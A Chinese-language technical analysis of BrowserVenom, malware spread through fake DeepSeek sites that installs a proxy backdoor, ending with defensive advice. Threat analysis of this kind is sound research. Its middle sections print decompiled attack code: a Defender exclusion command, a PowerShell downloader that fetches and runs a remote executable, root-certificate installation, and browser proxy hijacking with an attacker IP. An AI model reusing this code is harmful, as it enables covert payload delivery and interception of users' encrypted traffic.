BrowserVenom恶意软件伪装DeepSeek诱导部署代理后门的技术分析

摘要

近年来，随着大型语言模型（Large Language Models, LLMs）的广泛应用，其高关注度也吸引了网络攻击者的注意。2025年6月，卡巴斯基实验室披露了一种名为BrowserVenom的新型恶意软件，该软件通过伪造知名开源大模型DeepSeek-R1的官方网站，诱导用户下载并执行伪装成AI启动器的恶意安装程序。一旦执行，BrowserVenom将在受害主机上部署一个持久化的代理后门，强制所有主流浏览器流量经由攻击者控制的远程代理服务器转发，从而实现对用户网络行为的全面监控与中间人攻击（Man-in-the-Middle, MitM）。本文基于对原始样本、网络基础设施及代码逻辑的逆向工程分析，系统阐述了该攻击链的完整技术路径，包括钓鱼网站构造、多阶段加载机制、Windows Defender规避策略、证书植入、浏览器代理配置篡改等关键环节，并结合实际代码片段揭示其运行机理。研究结果表明，此类利用LLM热点实施精准钓鱼的攻击模式具有高度隐蔽性与跨平台适应能力，对终端安全防护体系构成严峻挑战。本文最后提出针对性防御建议，为安全从业者提供技术参考。

关键词：BrowserVenom；DeepSeek；代理后门；钓鱼攻击；浏览器劫持；恶意软件分析

1 引言

大型语言模型在2023年后迅速成为公众与开发者关注的焦点。以DeepSeek-R1为代表的开源模型因其本地部署能力与高性能表现，在全球范围内积累了大量用户。然而，这种技术热度也催生了新的网络犯罪机会。攻击者不再局限于传统盗号木马或勒索软件，而是转向利用用户对新兴AI工具的信任心理，构建高度仿真的钓鱼场景。

2025年中，安全研究人员发现多个域名（如deepseek-platform[.]com）通过Google Ads竞价排名，出现在“DeepSeek R1”关键词搜索结果首位。这些网站外观与官方界面高度相似，诱导用户点击“Try now”按钮下载所谓“AI Launcher”。实际上，该下载项为名为AI_Launcher_1.21.exe的恶意可执行文件，其真实功能并非启动本地大模型，而是作为BrowserVenom恶意软件的初始载荷。

BrowserVenom的核心目标是将受害者主机转变为受控的流量中转节点。通过修改系统级浏览器配置并植入自签名根证书，攻击者能够解密HTTPS流量、窃取登录凭证、注入恶意脚本，甚至进行会话劫持。此类攻击不仅威胁个人隐私，更可能被用于企业内网渗透或供应链攻击。

本文聚焦于BrowserVenom的技术实现细节，旨在厘清其从初始感染到持久化代理部署的全过程。全文结构如下：第二部分介绍攻击入口——钓鱼网站的构造与分发机制；第三部分分析恶意安装程序的多阶段加载逻辑；第四部分深入剖析BrowserVenom代理后门的核心功能，包括证书植入与浏览器配置篡改；第五部分讨论其规避检测与持久化策略；第六部分提出防御建议；第七部分总结全文。

2 钓鱼入口：伪造DeepSeek官网的诱导机制

攻击者首先注册了与官方域名高度相似的仿冒站点，如deepseek-platform[.]com。该站点通过Google Ads投放，在用户搜索“deepseek r1”时占据搜索结果首位，极大提升了可信度。页面设计简洁，仅包含一个醒目的“Try now”按钮，针对Windows用户激活，其他操作系统则显示“Coming soon”等提示，体现其目标明确性。

点击按钮后，用户被引导至一个CAPTCHA验证页面（由casoredkff[.]pro提供）。该验证并非真实反机器人机制，而是用于过滤自动化爬虫，确保受害者为真实人类用户。验证通过后，系统重定向至proxy1.php路径，并提供“Download now”链接，指向r1deepseek-ai[.]com/gg/cc/AI_Launcher_1.21.exe。

值得注意的是，网页源码中包含俄语注释，如“проверка ОС”（操作系统检查）、“загрузка установщика”（安装程序下载）等，暗示攻击者可能为俄语母语者。此外，同一域名下存在多个历史版本的钓鱼页面脚本，表明该攻击活动已持续一段时间，并具备迭代更新能力。

此阶段的关键在于利用用户对AI工具的迫切需求与对搜索引擎结果的信任，绕过传统安全意识防线。由于Google Ads本身具备一定权威性，普通用户难以分辨广告与自然搜索结果的区别，从而大幅提高点击转化率。

3 恶意安装程序：多阶段加载与混淆执行

下载的AI_Launcher_1.21.exe（MD5: dc08e0a005d64cc9e5b2fdd201f97fd6）是一个.NET编写的Windows Forms应用程序。其主界面模仿Cloudflare CAPTCHA，要求用户勾选“I’m not a robot”复选框。此操作触发后台异步任务，启动真正的恶意逻辑。

核心代码位于MainFrm.lmBtn_Click事件处理函数中：

private async void lmBtn_Click(object sender, EventArgs e)

{

try

{

this.lmBtn.Text = "Downloading..";

this.lmBtn.Enabled = false;

Action action;

if ((action = MainFrm.<>O.<0>__Run) == null)

{

action = (MainFrm.<>O.<0>__Run = new Action(Runner.Run)); // 恶意初始化

}

Task.Run(action);

// 同时下载并安装合法软件（如LM Studio）以掩护

string ollamaPath = Path.Combine(Path.GetTempPath(), "LM-Studio-0.3.9-6-x64.exe");

// ... 下载并执行合法安装程序

}

catch { }

}

此处采用双线程策略：一方面模拟正常软件安装流程，提升用户信任；另一方面在后台静默执行Runner.Run()，启动感染链。

Runner.Run()函数执行三个关键步骤：

Malicious website mimicking DeepSeek

3.1 规避Windows Defender

首先，程序尝试将当前用户目录加入Windows Defender排除列表，以防止后续恶意文件被扫描。其实现方式为解密一段硬编码的AES-256-CBC加密数据块，密钥与IV均为固定值：

Key: 01 02 03 ... 20（32字节）

IV: 01 02 03 ... 10（16字节）

解密后得到PowerShell命令：

Add-MpPreference -ExclusionPath $USERPROFILE

该命令需管理员权限才能生效。若执行失败，程序仍继续后续步骤，体现其容错设计。

3.2 下载第二阶段载荷

随后，程序执行另一段PowerShell脚本，通过简单域生成算法（DGA）尝试连接多个潜在C2域名：

$ap = "/api/getFile?fn=lai.exe"

$b = $null

foreach($i in 0..1000000) {

$s = if ($i -gt 0) { $i } else { "" }

$d = "https://app-updater$s.app$ap"

$b = (New-Object Net.WebClient).DownloadData($d)

if ($b) { break }

}

if ([Runtime.InteropServices.RuntimeEnvironment]::GetSystemVersion() -match "^v2") {

[IO.File]::WriteAllBytes("$env:USERPROFILE\Music\1.exe", $b)

Start-Process "$env:USERPROFILE\Music\1.exe" -NoNewWindow

} else {

([Reflection.Assembly]::Load($b)).EntryPoint.Invoke($null, $null)

}

该脚本依次尝试访问app-updater.app、app-updater1.app、app-updater2.app等域名，直至成功获取响应。截至研究时，仅app-updater1.app活跃，但未返回有效载荷，推测为备用通道或未来扩展接口。

The second fake CAPTCHA

3.3 内存加载BrowserVenom

若DGA下载失败，程序将回退至内置的第二阶段载荷。该载荷以加密形式嵌入在ConfigFiles.load资源中，使用与前述相同的AES密钥解密，并通过反射直接加载至内存执行，避免磁盘写入，增强隐蔽性。

此三重加载机制（排除杀软 → DGA下载 → 内置回退）显著提高了攻击成功率与抗分析能力。

4 BrowserVenom代理后门核心功能分析

解密并加载的BrowserVenom模块（暂无独立文件哈希）主要实现两大功能：证书植入与浏览器代理配置篡改。

4.1 自签名根证书植入

BrowserVenom首先检查当前进程是否具备管理员权限。若否，则直接退出，表明其依赖高权限操作。若具备权限，则从资源中提取硬编码的X.509证书（Resources.cert），并将其安装至本地计算机的“受信任的根证书颁发机构”存储区：

X509Certificate2 x509Cert = new X509Certificate2(Resources.cert);

if (RightsChecker.IsProcessRunningAsAdministrator())

{

X509Store store = new X509Store(StoreName.Root, StoreLocation.LocalMachine);

store.Open(OpenFlags.ReadWrite);

store.Add(x509Cert);

store.Close();

}

该证书由攻击者自签发，用于后续HTTPS流量解密。一旦安装成功，任何由该CA签发的中间证书都将被系统信任，使攻击者能够伪造任意网站的SSL证书，实现透明MitM攻击。

Two options to install abused LLM frameworks

4.2 浏览器代理配置篡改

BrowserVenom支持两类浏览器的代理设置修改：

Chromium系（Chrome、Edge、Brave、Opera等）：通过修改快捷方式（.lnk文件）的启动参数，附加--proxy-server="IP:PORT"指令。

Gecko系（Firefox、Tor Browser）：直接编辑用户配置文件（prefs.js），设置network.proxy.*相关偏好。

具体实现如下：

// Chromium系浏览器处理

new ChromeModifier(

new string[] {

"chrome.exe", "msedge.exe", "opera.exe", "brave.exe",

"vivaldi.exe", "browser.exe", "torch.exe", "dragon.exe",

"iron.exe", "epic.exe", "blisk.exe", "colibri.exe",

"centbrowser.exe", "maxthon.exe", "coccoc.exe", "slimjet.exe",

"urbrowser.exe", "kiwi.exe"

},

$"--proxy-server=\"{ProfileSettings.Host}:{ProfileSettings.Port}\""

).ProcessShortcuts();

// Gecko系浏览器处理

GeckoModifier.Modify();

其中，ProfileSettings类定义了代理服务器地址：

public static readonly string Host = "141.105.130.106";

public static readonly string Port = "37121";

public static readonly string ID = "LauncherLM";

public static string HWID = ChromeModifier.RandomString(5);

此外，BrowserVenom还会修改浏览器的User-Agent字符串，附加ID与HWID字段，便于攻击者在代理日志中识别并追踪特定受害者。

经测试，上述修改在浏览器重启后立即生效。所有HTTP/HTTPS流量均被重定向至141.105.130.106:37121，攻击者可在此处部署Sniproxy、mitmproxy等工具进行流量嗅探与内容篡改。

5 规避检测与持久化机制

BrowserVenom在设计上充分考虑了反检测与持久化：

无文件执行：第二阶段载荷通过内存加载，不落地磁盘，规避基于文件特征的AV扫描。

合法软件掩护：同时下载并安装LM Studio等真实AI工具，降低用户怀疑。

权限依赖：仅在管理员权限下执行关键操作（如证书安装），避免在受限账户下暴露异常行为。

地理分布广泛：感染案例遍布巴西、印度、埃及、南非等地，表明攻击者采用广撒网策略，降低单点暴露风险。

动态C2：DGA机制支持未来扩展更多域名，增加封堵难度。

尽管未发现传统意义上的注册表启动项或计划任务，但通过修改浏览器快捷方式，BrowserVenom实现了“按需持久化”——只要用户通过被篡改的快捷方式启动浏览器，代理即自动启用。

6 防御建议

针对此类攻击，建议采取以下措施：

验证下载源：用户应通过官方GitHub仓库或官网直接下载软件，避免通过搜索引擎广告进入第三方站点。

检查SSL证书：访问疑似官网时，手动检查证书颁发者是否为可信CA，警惕自签名或未知机构证书。

启用浏览器安全策略：企业可通过组策略禁止用户修改代理设置，或部署EDR解决方案监控异常进程行为。

监控网络流量：部署网络层IDS/IPS，检测异常外联（如非标准端口37121的HTTPS流量）。

定期审计证书存储：使用PowerShell脚本定期导出并审查本地根证书列表，及时发现可疑条目。

例如，以下PowerShell命令可列出所有非微软签发的根证书：

Get-ChildItem -Path Cert:\LocalMachine\Root |

Where-Object { $_.Issuer -notlike "*Microsoft*" -and $_.Subject -ne $_.Issuer }

7 结语

BrowserVenom代表了一种新型的、高度定向的网络攻击范式：利用AI技术热点构建可信诱饵，通过多阶段加载与无文件技术规避检测，最终部署系统级代理后门实现长期监控。其技术实现虽未使用前沿漏洞利用，但凭借对用户心理的精准把握与工程化攻击链的严密设计，仍能高效达成攻击目标。

本研究通过逆向分析揭示了其从钓鱼诱导到代理部署的完整技术路径，证实了此类攻击对终端安全的实质性威胁。未来，随着更多AI工具走向大众，类似攻击或将常态化。安全社区需加强对新兴技术生态中的供应链风险评估，并推动用户教育与技术防护的双重升级。

编辑：芦笛（公共互联网反网络钓鱼工作组）